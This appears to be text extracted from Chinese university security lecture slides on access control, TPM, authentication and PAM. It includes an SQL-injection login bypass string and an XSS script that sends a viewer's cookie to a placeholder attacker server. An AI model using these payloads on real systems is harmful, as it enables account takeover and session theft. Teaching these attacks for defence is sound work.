該文件的訪問(wèn)權(quán)限假設(shè)用戶U1是文件F1的擁有者,U2是任意用戶那么,U1可以授權(quán)U2獲得訪問(wèn)F1的r、w、x中的一項(xiàng)或多項(xiàng)權(quán)限訪問(wèn)權(quán)限既可以授給用戶,也可以授給用戶組2.3.2操作系統(tǒng)安全強(qiáng)制訪問(wèn)控制如Adept-50操作系統(tǒng)實(shí)現(xiàn)一個(gè)多級(jí)安全策略(MLS,Multi-LevelSecurity)信息按照保密程度劃分了多個(gè)級(jí)別,用戶按照職務(wù)層次劃分了多個(gè)等級(jí)訪問(wèn)許可的判斷依據(jù)是信息的級(jí)別和用戶的等級(jí),不是用戶的意愿2.3.2操作系統(tǒng)安全日志功能記錄系統(tǒng)中發(fā)生的重要活動(dòng)的詳細(xì)信息Aug2114:44:24siselabsu(pam_unix)[1149]:sessionopenedforuserrootbyalice(uid=600)2.3.2操作系統(tǒng)安全關(guān)系數(shù)據(jù)庫(kù)是二維表學(xué)生登記表2.3.3數(shù)據(jù)庫(kù)系統(tǒng)安全數(shù)據(jù)庫(kù)表的基本操作SQL語(yǔ)言SELECT、UPDATE、INSERT、DELETE SELECT*FROM學(xué)生登記表WHERE年齡<=172.3.3數(shù)據(jù)庫(kù)系統(tǒng)安全關(guān)系數(shù)據(jù)庫(kù)自主訪問(wèn)控制訪問(wèn)授權(quán)
GRANTSELECTON學(xué)生登記表TO丁松撤銷授權(quán)
REVOKEUPDATEON學(xué)生登記表FROM胡影2.3.3數(shù)據(jù)庫(kù)系統(tǒng)安全數(shù)據(jù)庫(kù)強(qiáng)制訪問(wèn)控制/多級(jí)安全數(shù)據(jù)庫(kù)根據(jù)數(shù)據(jù)的敏感程度,確定數(shù)據(jù)的敏感級(jí)別根據(jù)用戶在工作中應(yīng)該涉及的數(shù)據(jù)的敏感程度,為用戶分配敏感等級(jí)可以基于表、字段或記錄建立敏感級(jí)別2.3.3數(shù)據(jù)庫(kù)系統(tǒng)安全數(shù)據(jù)推理(Inference)根據(jù)合法的非敏感數(shù)據(jù)推導(dǎo)出非法的敏感數(shù)據(jù)對(duì)數(shù)據(jù)庫(kù)數(shù)據(jù)進(jìn)行非法間接訪問(wèn)推理威脅源自統(tǒng)計(jì)數(shù)據(jù)庫(kù)2.3.3數(shù)據(jù)庫(kù)系統(tǒng)安全數(shù)據(jù)庫(kù)SQL注入攻擊:接口SELECTUserList.UsernameFROMUserListWHEREUserList.Username='Username’ANDUserList.Password='Password'2.3.3數(shù)據(jù)庫(kù)系統(tǒng)安全應(yīng)用程序登錄界面用戶名口令確定數(shù)據(jù)庫(kù)SQL注入攻擊:巧妙的輸入SELECTUserList.UsernameFROMUserListWHEREUserList.Username='zhangsan’ANDUserList.Password='password'OR'1'='1'2.3.3數(shù)據(jù)庫(kù)系統(tǒng)安全應(yīng)用程序登錄界面用戶名口令確定zhangsanpassword'OR'1'='1基于Web的應(yīng)用的基本架構(gòu)2.3.4應(yīng)用系統(tǒng)安全用戶A瀏覽器1網(wǎng)站W(wǎng)服務(wù)器用戶B瀏覽器2一個(gè)基于Web的論壇應(yīng)用2.3.4應(yīng)用系統(tǒng)安全用戶A瀏覽器1網(wǎng)站W(wǎng)服務(wù)器用戶B瀏覽器2新冠疫情在全球蔓延發(fā)評(píng)論新冠疫情在全球蔓延發(fā)評(píng)論含有腳本的評(píng)論用戶A發(fā)的評(píng)論:新冠病毒<script>alert('阿門')</script>用戶B看到的評(píng)論:新冠病毒+彈出框:阿門2.3.4應(yīng)用系統(tǒng)安全跨站腳本(XSS)攻擊用戶A在評(píng)論中嵌入以下腳本:<script>window.location='http://ServerofA/?cookie='+document.cookie</script>用戶B查看評(píng)論是:用戶B的機(jī)器上的敏感信息隨cookie被偷偷傳輸?shù)接脩鬉指定的服務(wù)器中2.3.4應(yīng)用系統(tǒng)安全什么是cookie?瀏覽器與服務(wù)器交互時(shí),由服務(wù)器建立,由瀏覽器保存的一些賦值信息在后續(xù)交互時(shí),瀏覽器會(huì)把這些信息返還給服務(wù)器,使服務(wù)器了解瀏覽器的過(guò)往行為2.3.4應(yīng)用系統(tǒng)安全cookie示例:第一步瀏覽器第一次向服務(wù)器發(fā)以下請(qǐng)求:GET/index.htmlHTTP/1.1Host:2.3.4應(yīng)用系統(tǒng)安全cookie示例:第二步服務(wù)器給瀏覽器發(fā)以下響應(yīng):HTTP/1.0200OKContent-type:text/htmlSet-Cookie:theme=lightSet-Cookie:sessionToken=abc123;Expires=Wed,09Jun202110:18:14GMT2.3.4應(yīng)用系統(tǒng)安全cookie示例:第三步瀏覽器在后續(xù)訪問(wèn)中向服務(wù)器發(fā)以下請(qǐng)求:GET/spec.htmlHTTP/1.1Host:Cookie:theme=light;sessionToken=abc1232.3.4應(yīng)用系統(tǒng)安全cookie示例:說(shuō)明以下信息屬于cookie:theme=lightsessionToken=abc123cookie中可能包含敏感信息,如用戶名、口令、信用卡號(hào)碼等2.3.4應(yīng)用系統(tǒng)安全生態(tài)學(xué)系統(tǒng)/生態(tài)系統(tǒng)在一定區(qū)域中共同棲居著的所有生物(即生物群落)與其環(huán)境之間由于不斷進(jìn)行物質(zhì)循環(huán)和能量流動(dòng)過(guò)程而形成的統(tǒng)一整體。2.3.5安全生態(tài)系統(tǒng)統(tǒng)一整體生物體和環(huán)境的統(tǒng)一人與自然的統(tǒng)一有機(jī)與無(wú)機(jī)世界是一個(gè)功能整體,如果不了解整個(gè)系統(tǒng)是不可能了解其中任一部分的。阿弗雷德?洛特卡美國(guó)數(shù)學(xué)家、物理化學(xué)家、統(tǒng)計(jì)學(xué)家2.3.5安全生態(tài)系統(tǒng)區(qū)域一個(gè)池塘、一片森林、一段海灘、一個(gè)湖泊2.3.5安全生態(tài)系統(tǒng)物質(zhì)循環(huán)無(wú)機(jī)物(碳、氮、磷、水、二氧化碳等)、有機(jī)物(蛋白質(zhì)、糖類、脂肪、腐殖質(zhì)等)2.3.5安全生態(tài)系統(tǒng)能量流動(dòng)光、功、熱、食物的潛能能量的運(yùn)轉(zhuǎn)由物理定律支配:熱力學(xué)第一、第二定律2.3.5安全生態(tài)系統(tǒng)生態(tài)系統(tǒng)組成成分物質(zhì)循環(huán)中的無(wú)機(jī)物連接生物和非生物組分的有機(jī)化合物空氣、水和基質(zhì)環(huán)境生產(chǎn)者吞噬生物腐生生物2.3.5安全生態(tài)系統(tǒng)生態(tài)系統(tǒng)是個(gè)控制論系統(tǒng)諾伯特·維納1948年創(chuàng)立的控制論科學(xué)包括無(wú)生命控制和生命控制機(jī)械反饋裝置:自動(dòng)控制裝置生物系統(tǒng)反饋裝置:內(nèi)穩(wěn)態(tài)機(jī)制2.3.5安全生態(tài)系統(tǒng)生態(tài)系統(tǒng)中的信息網(wǎng)絡(luò)系統(tǒng)所有部分由物理和化學(xué)信息連接起來(lái)組分通過(guò)各種物理和化學(xué)信息形成網(wǎng)狀關(guān)系物理和化學(xué)信息的流動(dòng)產(chǎn)生對(duì)系統(tǒng)的控制2.3.5安全生態(tài)系統(tǒng)數(shù)字生態(tài)系統(tǒng)一個(gè)數(shù)字生態(tài)系統(tǒng)是一個(gè)分布式的、適應(yīng)性的、開放的社會(huì)-技術(shù)系統(tǒng),受自然生態(tài)系統(tǒng)啟發(fā),它具有自組織性、可伸縮性、和可持續(xù)性。數(shù)字生態(tài)系統(tǒng)模型受到了自然生態(tài)系統(tǒng)知識(shí)的啟示,尤其是在形形色色的實(shí)體之間的競(jìng)爭(zhēng)與合作的相關(guān)方面。Adigitalecosystemisadistributed,adaptive,opensocio-technicalsystemwithpropertiesofself-organisation,scalabilityandsustainabilityinspiredfromnaturalecosystems.Digitalecosystemmodelsareinformedbyknowledgeofnaturalecosystems,especiallyforaspectsrelatedtocompetitionandcollaborationamongdiverseentities.2.3.5安全生態(tài)系統(tǒng)網(wǎng)絡(luò)空間生態(tài)系統(tǒng)像自然生態(tài)系統(tǒng)一樣,網(wǎng)絡(luò)空間生態(tài)系統(tǒng)由形形色色的、出于多種目的進(jìn)行交互的各種成員構(gòu)成,主要成員包括私營(yíng)企業(yè)、非營(yíng)利組織、政府、個(gè)人、過(guò)程、和網(wǎng)絡(luò)空間設(shè)備等,主要設(shè)備包括計(jì)算機(jī)、軟件、和通信技術(shù)等。Likenaturalecosystems,thecyberecosystemcomprisesavarietyofdiverseparticipants–privatefirms,non-profits,governments,individuals,processes,andcyberdevices(computers,software,andcommunicationstechnologies)–thatinteractformultiplepurposes.2.3.5安全生態(tài)系統(tǒng)互聯(lián)網(wǎng)生態(tài)系統(tǒng)個(gè)人組織商業(yè)政府機(jī)器/設(shè)備服務(wù)創(chuàng)立者和儀器制造者互聯(lián)網(wǎng)協(xié)會(huì)政府分會(huì)個(gè)人會(huì)員組織會(huì)員多邊組織與開發(fā)機(jī)構(gòu)互聯(lián)網(wǎng)社區(qū)組織與業(yè)務(wù)大學(xué)與學(xué)術(shù)機(jī)構(gòu)政府政府的地區(qū)組織多邊組織互聯(lián)網(wǎng)協(xié)會(huì)分會(huì)個(gè)人會(huì)員組織會(huì)員其它政策討論平臺(tái)其它標(biāo)準(zhǔn)化組織互聯(lián)網(wǎng)協(xié)會(huì)附屬組織W3CITU-T專項(xiàng)組織IETFIABIRTF根服務(wù)器網(wǎng)絡(luò)運(yùn)營(yíng)者服務(wù)創(chuàng)立者/廠商互聯(lián)網(wǎng)交換點(diǎn)gTLDsccTLDsccTLDsgTLDsIANARIRsICANN2.3.5安全生態(tài)系統(tǒng)生態(tài)系統(tǒng)安全問(wèn)題的應(yīng)對(duì)理念方面:把系統(tǒng)的概念拓展到生態(tài)系統(tǒng)的范圍,重新認(rèn)識(shí)安全威脅,重新構(gòu)建安全模型技術(shù)方面:要有新的支撐技術(shù)2.3.5安全生態(tài)系統(tǒng)生態(tài)系統(tǒng)視角下的安全威脅模型不但要考慮企業(yè)自身的安全因素還必須考慮合作伙伴的安全因素2.3.5安全生態(tài)系統(tǒng)安全生態(tài)系統(tǒng)的關(guān)鍵支撐技術(shù)自動(dòng)化Automation讓響應(yīng)速度跟上攻擊速度,而不是以人力的響應(yīng)速度應(yīng)對(duì)機(jī)器的攻擊速度。互操作性Interoperability由策略而不是技術(shù)約束定義網(wǎng)絡(luò)空間共同體,允許網(wǎng)絡(luò)空間生態(tài)系統(tǒng)成員在自動(dòng)化的團(tuán)體防御中無(wú)縫地、動(dòng)態(tài)地協(xié)作。認(rèn)證Authentication為在線決策建立基礎(chǔ),由人員認(rèn)證擴(kuò)展到包含設(shè)備認(rèn)證,設(shè)備可以是計(jì)算機(jī)、軟件、或信息等。2.3.5安全生態(tài)系統(tǒng)問(wèn)題?20xx-20xx學(xué)年x季學(xué)期第三章系統(tǒng)安全硬件基礎(chǔ)3.1問(wèn)題與發(fā)展背景純軟件安全機(jī)制的不足程序的篡改數(shù)據(jù)的泄露3.1問(wèn)題與發(fā)展背景對(duì)可信/信任的理解信任是一種需受保護(hù)的社會(huì)財(cái)富,正如我們呼吸的空氣或我們飲用的水那樣,如其受到損害,社會(huì)將會(huì)受挫,如其被摧毀,社會(huì)將搖搖欲墜乃至崩潰。信任意味著結(jié)果在某種程度上的不確定,信任意味著結(jié)果的有望或樂(lè)觀。社會(huì)層面、生物層面、技術(shù)層面……3.1問(wèn)題與發(fā)展背景可信計(jì)算發(fā)展?fàn)顩rTCPA==>TCGTPM1.2==>TPM2.03.1問(wèn)題與發(fā)展背景3.2可信平臺(tái)基本思想基本概念信任信任根度量核心信任根度量信任根存儲(chǔ)信任根報(bào)告信任根信任傳遞信任鏈可信平臺(tái)模塊TPM受保護(hù)功能受保護(hù)存儲(chǔ)區(qū)可信計(jì)算基3.2可信平臺(tái)基本思想可信構(gòu)造塊3.2可信平臺(tái)基本思想系統(tǒng)引導(dǎo)過(guò)程的信任傳遞3.2可信平臺(tái)基本思想對(duì)外證明3.2可信平臺(tái)基本思想3.3可信平臺(tái)模塊TPMTPM組成結(jié)構(gòu)3.3可信平臺(tái)模塊TPMTPM的擴(kuò)展功能Extend3.3可信平臺(tái)模塊TPM對(duì)稱簽名與驗(yàn)證3.3可信平臺(tái)模塊TPM3.4TPM的基本用法基于數(shù)據(jù)包的對(duì)話3.4TPM的基本用法一個(gè)命令包3.4TPM的基本用法一個(gè)響應(yīng)包3.4TPM的基本用法原始的對(duì)話方法3.4TPM的基本用法可信平臺(tái)軟件體系結(jié)構(gòu)3.4TPM的基本用法可信平臺(tái)應(yīng)用方案類型3.4TPM的基本用法3.5TPM應(yīng)用案例BitLocker的主要功能整卷加密完整性檢查3.5TPM應(yīng)用案例BitLocker對(duì)分區(qū)的要求系統(tǒng)分區(qū)Windows分區(qū)3.5TPM應(yīng)用案例系統(tǒng)分區(qū)Windows分區(qū)BitLocker的體系結(jié)構(gòu)3.5TPM應(yīng)用案例BitLocker的加密原理3.5TPM應(yīng)用案例BitLocker的解密原理3.5TPM應(yīng)用案例TPM的封裝功能Seal加密<=++++++++++++=PCR寄存器PCR寄存器=++++++++++++=>解密3.5TPM應(yīng)用案例初次整卷加密時(shí)的封裝計(jì)算系統(tǒng)分區(qū)相關(guān)組件的哈希值把計(jì)算結(jié)果擴(kuò)展到PCR寄存器用相應(yīng)寄存器封裝主密鑰VMK3.5TPM應(yīng)用案例引導(dǎo)時(shí)的完整性檢查依次計(jì)算系統(tǒng)分區(qū)相關(guān)組件的哈希值把計(jì)算結(jié)果擴(kuò)展到PCR寄存器試圖解封裝主密鑰VMK3.5TPM應(yīng)用案例問(wèn)題?20xx-20xx學(xué)年x季學(xué)期第四章身份認(rèn)證機(jī)制(上)內(nèi)容提綱4.1身份認(rèn)證技術(shù)概述4.2身份標(biāo)識(shí)與認(rèn)證4.3口令處理方法4.7統(tǒng)一的身份認(rèn)證框架What'suserauthentication?Theprocessofverifyinganidentityclaimedbyorforasystementity.(RFC2828)身份認(rèn)證:為實(shí)體驗(yàn)證其所宣稱的身份的過(guò)程Areyouwhoyousayyouare?4.1身份認(rèn)證技術(shù)概述MeansofauthenticationPassword-basedauthenticationSomethingyouknowToken-basedauthenticationSomethingyouhaveBiometricauthenticationSomethingyouare(staticbiometrics)Somethingyoudo(dynamicbiometrics)4.1身份認(rèn)證技術(shù)概述What'stoken?Objectsthatauserpossessesforthepurposeofuserauthenticationarecalledtokens.MemorycardHotelroomcard,bankcardSmarttokenSmartcard令牌4.1身份認(rèn)證技術(shù)概述SmarttokenauthenticationprotocolStaticDynamicpasswordgeneratorChallenge-response4.1身份認(rèn)證技術(shù)概述Smartcard/readerexchangeReset4.1身份認(rèn)證技術(shù)概述BiometricRecognitionCharacteristics4.1身份認(rèn)證技術(shù)概述Irisauthenticationapplication4.1身份認(rèn)證技術(shù)概述Two-factorauthenticationAnyauthenticationmethodthatrequirestwo"something"isknownastwo-factorauthenticationATM:card+PIN雙因子認(rèn)證4.1身份認(rèn)證技術(shù)概述Singlesign-onYouauthenticateonceandthenhaveasuccessfulresultautomatically"follow"youwhereveryougoontheInternet單點(diǎn)登錄4.1身份認(rèn)證技術(shù)概述4.2身份標(biāo)識(shí)與認(rèn)證UNIX賬戶文件/etc/passwd4.2.1身份標(biāo)識(shí)的基本方法UNIX組文件/etc/group4.2.1身份標(biāo)識(shí)的基本方法Linux用戶登錄過(guò)程4.2.2身份認(rèn)證的基本過(guò)程Linux用戶修改口令過(guò)程4.2.2身份認(rèn)證的基本過(guò)程4.3口令處理方法口令字段信息的生成4.3.1口令信息的維護(hù)與運(yùn)用二進(jìn)制位串到字符串的轉(zhuǎn)換64位的位串==>11個(gè)6位的位組;每個(gè)位組==>二進(jìn)制數(shù)值,得到11個(gè)整數(shù);每個(gè)整數(shù)==>字符,得到11個(gè)字符;11個(gè)字符==>字符串。4.3.1口令信息的維護(hù)與運(yùn)用增強(qiáng)的口令字段生成4.3.1口令信息的維護(hù)與運(yùn)用液體撒鹽實(shí)驗(yàn)4.3.2口令管理中的撒鹽措施口令撒鹽算法4.3.2口令管理中的撒鹽措施撒鹽的身份認(rèn)證:口令字段生成4.3.2口令管理中的撒鹽措施撒鹽的身份認(rèn)證:口令字段維護(hù)4.3.2口令管理中的撒鹽措施撒鹽的身份認(rèn)證:身份認(rèn)證4.3.2口令管理中的撒鹽措施UNIX口令示例4.3.2口令管理中的撒鹽措施UNIX口令文件/etc/shadow4.3.3口令信息與賬戶的分離Hashedpasswordscheme:loading4.3口令處理方法Hashedpasswordscheme:verifying4.3口令處理方法4.7統(tǒng)一的身份認(rèn)證框架插拔式統(tǒng)一認(rèn)證框架PAMPAM(PluggableAuthenticationModules)是一個(gè)統(tǒng)一的身份認(rèn)證框架。起初,它是由美國(guó)Sun公司為Solaris操作系統(tǒng)開發(fā)的。后來(lái),很多操作系統(tǒng)都實(shí)現(xiàn)了對(duì)它的支持。動(dòng)態(tài)口令認(rèn)證智能卡認(rèn)證4.7統(tǒng)一的身份認(rèn)證框架PAM認(rèn)證系統(tǒng)的構(gòu)成PAM應(yīng)用編程接口(API)PAM模塊(動(dòng)態(tài)裝載庫(kù)),提供以下服務(wù)功能支持:身份認(rèn)證(auth)賬戶管理(account)口令管理(password)會(huì)話管理(session)PAM配置文件4.7統(tǒng)一的身份認(rèn)證框架PAM認(rèn)證系統(tǒng)的工作原理4.7統(tǒng)一的身份認(rèn)證框架例4.3—配置文件/etc/pam.conf示例UNIX系統(tǒng)中為OpenSSH服務(wù)程序定義的配置信息sshd auth required /lib/security/pam_env.sosshd auth sufficient /lib/security/pam_unix.solikeauthnulloksshd auth required /lib/security/pam_deny.sosshd account required /lib/security/pam_unix.sosshd password required /lib/security/pam_cracklib.soretry=3sshd password sufficient /lib/security/pam_unix.sonullokuse_authtokmd5shadowsshd password required /lib/security/pam_deny.sosshd session required /lib/security/pam_limits.sosshd session required /lib/security/pam_unix.so4.7統(tǒng)一的身份認(rèn)證框架例4.3—配置文件/etc/pam.conf示例UNIX系統(tǒng)中為OpenSSH服務(wù)程序定義的配置信息sshd auth required /lib/security/pam_env.sosshd auth sufficient /lib/security/pam_unix.solikeauthnulloksshd auth required /lib/security/pam_deny.sosshd account required /lib/security/pam_unix.sosshd password required /lib/security/pam_cracklib.soretry=3sshd password sufficient /lib/security/pam_unix.sonullokuse_authtokmd5shadowsshd password required /lib/security/pam_deny.sosshd session required /lib/security/pam_limits.sosshd session required /lib/security/pam_unix.so服務(wù)程序的名稱4.7統(tǒng)一的身份認(rèn)證框架例4.3—配置文件/etc/pam.conf示例UNIX系統(tǒng)中為OpenSSH服務(wù)程序定義的配置信息sshd auth required /lib/security/pam_env.sosshd auth sufficient /lib/security/pam_unix.solikeauthnulloksshd auth required /lib/security/pam_deny.sosshd account required /lib/security/pam_unix.sosshd password required /lib/security/pam_cracklib.soretry=3sshd password sufficient /lib/security/pam_unix.sonullokuse_authtokmd5shadowsshd password required /lib/security/pam_deny.sosshd session required /lib/security/pam_limits.sosshd session required /lib/security/pam_unix.so服務(wù)類型4.7統(tǒng)一的身份認(rèn)證框架例4.3—配置文件/etc/pam.conf示例UNIX系統(tǒng)中為OpenSSH服務(wù)程序定義的配置信息sshd auth required /lib/security/pam_env.sosshd auth sufficient /lib/security/pam_unix.solikeauthnulloksshd auth required /lib/security/pam_deny.sosshd account required /lib/security/pam_unix.sosshd password required /lib/security/pam_cracklib.soretry=3sshd password sufficient /lib/security/pam_unix.sonullokuse_authtokmd5shadowsshd password required /lib/security/pam_deny.sosshd session required /lib/security/pam_limits.sosshd session required /lib/security/pam_unix.so命令控制標(biāo)記Requisite:模塊執(zhí)行失敗時(shí)報(bào)告失敗并結(jié)束認(rèn)證。Required:模塊執(zhí)行失敗時(shí)報(bào)告失敗但繼續(xù)認(rèn)證。Sufficient:模塊執(zhí)行成功時(shí)報(bào)告成功并結(jié)束認(rèn)證。Optional:模塊的執(zhí)行不影響報(bào)告結(jié)果和認(rèn)證過(guò)程。4.7統(tǒng)一的身份認(rèn)證框架例4.3—配置文件/etc/pam.conf示例UNIX系統(tǒng)中為OpenSSH服務(wù)程序定義的配置信息sshd auth required /lib/security/pam_env.sosshd auth sufficient /lib/security/pam_unix.solikeauthnulloksshd auth required /lib/security/pam_deny.sosshd account required /lib/security/pam_unix.sosshd password required /lib/security/pam_cracklib.soretry=3sshd password sufficient /lib/security/pam_unix.sonullokuse_authtokmd5shadowsshd password required /lib/security/pam_deny.sosshd session required /lib/security/pam_limits.sosshd session required /lib/security/pam_unix.so待執(zhí)行的模塊名稱及必要的參數(shù)4.7統(tǒng)一的身份認(rèn)證框架例4.3—配置文件/etc/pam.conf示例UNIX系統(tǒng)中為OpenSSH服務(wù)程序定義的配置信息sshd auth required /lib/security/pam_env.sosshd auth sufficient /lib/security/pam_unix.solikeauthnulloksshd auth required /lib/security/pam_deny.sosshd account required /lib/security/pam_unix.sosshd password required /lib/security/pam_cracklib.soretry=3sshd password sufficient /lib/security/pam_unix.sonullokuse_authtokmd5shadowsshd password required /lib/security/pam_deny.sosshd session required /lib/security/pam_limits.sosshd session required /lib/security/pam_unix.soOpenSSH進(jìn)行身份認(rèn)證時(shí),首先執(zhí)行pam_env模塊,然后執(zhí)行pam_unix模塊,如果pam_unix執(zhí)行成功且pam_env沒(méi)有失敗,則認(rèn)證結(jié)束并報(bào)告成功。如果pam_unix執(zhí)行失敗,則接著執(zhí)行pam_deny模塊。4.7統(tǒng)一的身份認(rèn)證框架問(wèn)題?20xx-20xx學(xué)年x季學(xué)期第四章身份認(rèn)證機(jī)制(下)內(nèi)容提綱4.4網(wǎng)絡(luò)環(huán)境的身份認(rèn)證4.5安全的網(wǎng)絡(luò)身份認(rèn)證4.6面向服務(wù)的再度認(rèn)證4.4網(wǎng)絡(luò)環(huán)境的身份認(rèn)證網(wǎng)絡(luò)環(huán)境用戶身份認(rèn)證需求4.4網(wǎng)絡(luò)環(huán)境的身份認(rèn)證方案4.7—網(wǎng)絡(luò)身份認(rèn)證方法參考本地主機(jī)身份認(rèn)證方法給出在網(wǎng)絡(luò)環(huán)境中進(jìn)行用戶身份認(rèn)證的方法同一個(gè)用戶可以在不同的主機(jī)上順利進(jìn)行身份認(rèn)證4.4網(wǎng)絡(luò)環(huán)境的身份認(rèn)證方案4.7—網(wǎng)絡(luò)身份認(rèn)證方法第一部分:身份認(rèn)證信息管理第二部分:客戶機(jī)軟件的功能第三部分:服務(wù)器軟件的功能4.4網(wǎng)絡(luò)環(huán)境的身份認(rèn)證方案4.7—身份認(rèn)證信息的管理wenchang:x:500:300:WenchangShi:/home/wenchang:/bin/bashwenchang:$1$k7TyrJaO$DS/P61XHIz1xWAqLcdnQz1:14091:0:99999:7:::sisefellow:x:300:wenchang,binliang,zhiyong,zhaohui帳戶信息口令信息用戶組信息4.4網(wǎng)絡(luò)環(huán)境的身份認(rèn)證方案4.7—客戶機(jī)軟件的功能用戶提供的:帳戶信息+口令信息
身份認(rèn)證請(qǐng)求把請(qǐng)求發(fā)送給服務(wù)器由服務(wù)器進(jìn)行身份認(rèn)證4.4網(wǎng)絡(luò)環(huán)境的身份認(rèn)證方案4.7—服務(wù)器軟件的功能身份認(rèn)證請(qǐng)求
帳戶信息+口令信息根據(jù)請(qǐng)求中的賬戶信息和口令信息,結(jié)合身份認(rèn)證信息數(shù)據(jù)庫(kù)中的對(duì)應(yīng)信息,判斷賬戶和口令的合法性。把判斷結(jié)果返回給客戶機(jī)4.4網(wǎng)絡(luò)環(huán)境的身份認(rèn)證方案4.8—客戶/服務(wù)端兼顧的認(rèn)證客戶機(jī)/服務(wù)器模式客戶機(jī)和服務(wù)器都可以執(zhí)行認(rèn)證根據(jù)用戶確定哪些認(rèn)證由服務(wù)器執(zhí)行,哪些認(rèn)證由客戶機(jī)執(zhí)行。4.4網(wǎng)絡(luò)環(huán)境的身份認(rèn)證方案4.8—客戶/服務(wù)端兼顧的認(rèn)證root:x:0:0:root:/root:/bin/bash
-wenchang::500:300:::+weinan::501:301:::+::999:999:::由服務(wù)器執(zhí)行由客戶機(jī)執(zhí)行表示所有賬戶4.4網(wǎng)絡(luò)環(huán)境的身份認(rèn)證方案4.8—客戶/服務(wù)端兼顧的認(rèn)證查詢本機(jī)賬戶信息,判斷是否由本機(jī)認(rèn)證。若需本機(jī)認(rèn)證,則客戶機(jī)執(zhí)行認(rèn)證。若需服務(wù)器認(rèn)證,則向服務(wù)器發(fā)請(qǐng)求(含賬戶名和口令)。4.4網(wǎng)絡(luò)環(huán)境的身份認(rèn)證方案4.8—客戶/服務(wù)端兼顧的認(rèn)證服務(wù)器根據(jù)認(rèn)證請(qǐng)求和認(rèn)證信息數(shù)據(jù)庫(kù)進(jìn)行認(rèn)證。把認(rèn)證結(jié)果返回給客戶機(jī)。4.4網(wǎng)絡(luò)環(huán)境的身份認(rèn)證網(wǎng)上身份認(rèn)證系統(tǒng)NIS美國(guó)Sun公司開發(fā)的NIS(NetworkInformationService)系統(tǒng)4.4網(wǎng)絡(luò)環(huán)境的身份認(rèn)證4.5安全的網(wǎng)絡(luò)身份認(rèn)證密碼體制秘密密鑰密碼體制—單鑰密碼體制公開密鑰密碼體制—雙鑰密碼體制4.5安全的網(wǎng)絡(luò)身份認(rèn)證公鑰加密與數(shù)字簽名公鑰加密數(shù)字簽名4.5安全的網(wǎng)絡(luò)身份認(rèn)證方案4.9—互認(rèn)證與加密通信Alice和Bob相互通信用公開密鑰密碼算法和秘密密鑰密碼算法Alice與Bob之間的身份認(rèn)證和信息加密傳輸4.5安全的網(wǎng)絡(luò)身份認(rèn)證方案4.9—互認(rèn)證與加密通信Alice的密鑰對(duì):KPUB-A,KPRI-ABob的密鑰對(duì):KPUB-B,KPRI-B4.5安全的網(wǎng)絡(luò)身份認(rèn)證方案4.10—網(wǎng)上認(rèn)證與加密通信通過(guò)服務(wù)器認(rèn)證客戶機(jī)上的用戶身份不能在網(wǎng)絡(luò)中傳輸明文的或者加密過(guò)的用戶口令4.5安全的網(wǎng)絡(luò)身份認(rèn)證方案4.10—網(wǎng)上認(rèn)證與加密通信在服務(wù)器上存放服務(wù)器和用戶的密鑰對(duì)。用戶登錄時(shí)把用口令加密的用戶私鑰傳給用戶。若以輸入的口令解密成功,則得到用戶私鑰。執(zhí)行互認(rèn)證。4.5安全的網(wǎng)絡(luò)身份認(rèn)證方案4.11—客戶/服務(wù)端兼顧的增強(qiáng)認(rèn)證在客戶機(jī)上登錄客戶機(jī)和服務(wù)器都可以執(zhí)行認(rèn)證根據(jù)用戶確定哪些認(rèn)證由服務(wù)器執(zhí)行,哪些認(rèn)證由客戶機(jī)執(zhí)行不能在網(wǎng)絡(luò)中傳輸明文的或者加密過(guò)的用戶口令4.5安全的網(wǎng)絡(luò)身份認(rèn)證方案4.11—客戶/服務(wù)端兼顧的增強(qiáng)認(rèn)證在客戶機(jī)的賬戶信息中添加標(biāo)識(shí):+或-,分別標(biāo)識(shí)服務(wù)器認(rèn)證、客戶機(jī)認(rèn)證。(方案4.8)在服務(wù)器中保存服務(wù)器和客戶機(jī)的密鑰對(duì),客戶機(jī)私鑰加密存放。(方案4.10)用戶登錄時(shí),若需服務(wù)器認(rèn)證,則客戶機(jī)把賬戶名信息傳給服務(wù)器,服務(wù)器把密鑰信息傳給客戶機(jī)(私鑰是加密的)。(方案4.10)客戶機(jī)用輸入的口令解密私鑰,解密成功后執(zhí)行互認(rèn)證。若只需客戶機(jī)認(rèn)證,則認(rèn)證直接由客戶機(jī)實(shí)施即可。4.5安全的網(wǎng)絡(luò)身份認(rèn)證網(wǎng)上身份認(rèn)證系統(tǒng)NIS+美國(guó)Sun公司開發(fā)的SecureRPC支持方案4.10Sun公司開發(fā)的以SecureRPC為基礎(chǔ)的NIS+系統(tǒng)支持方案4.114.5安全的網(wǎng)絡(luò)身份認(rèn)證4.6面向服務(wù)的再度認(rèn)證暢游頤和園的啟示進(jìn)園:購(gòu)買門票劃船:在門票的基礎(chǔ)上,另外購(gòu)買船票。專項(xiàng)服務(wù)項(xiàng)目:在頤和園劃船推而廣之:門票
通行證船票
服務(wù)卡通行證+服務(wù)卡
獲得專項(xiàng)服務(wù)4.6面向服務(wù)的再度認(rèn)證方案4.12—身份認(rèn)證+服務(wù)認(rèn)證用戶身份認(rèn)證和服務(wù)認(rèn)證方法不能在網(wǎng)上傳輸明文或密文的用戶口令無(wú)法使用公鑰密碼算法4.6面向服務(wù)的再度認(rèn)證方案4.12—身份認(rèn)證+服務(wù)認(rèn)證4.6面向服務(wù)的再度認(rèn)證服務(wù)認(rèn)證系統(tǒng)Kerberos美國(guó)麻省理工學(xué)院(MIT)開發(fā)的Kerberos認(rèn)證系統(tǒng)4.6面向服務(wù)的再度認(rèn)證問(wèn)題?20xx-20xx學(xué)年x季學(xué)期第五章操作系統(tǒng)基礎(chǔ)安全機(jī)制(上)內(nèi)容提綱5.1基于權(quán)限位的訪問(wèn)控制機(jī)制5.2訪問(wèn)控制的進(jìn)程實(shí)施機(jī)制5.3基于ACL的訪問(wèn)控制機(jī)制Accesscontrolsituation5.1基于權(quán)限位的訪問(wèn)控制機(jī)制簡(jiǎn)單訪問(wèn)控制權(quán)限及其表示方法一個(gè)賦值例子:5.1基于權(quán)限位的訪問(wèn)控制機(jī)制簡(jiǎn)單訪問(wèn)控制權(quán)限模式描述f(文件,用戶)
權(quán)限用戶:可以是一個(gè)用戶,也可以是一類用戶。權(quán)限:讀+寫+執(zhí)行。權(quán)限
位串
字符串
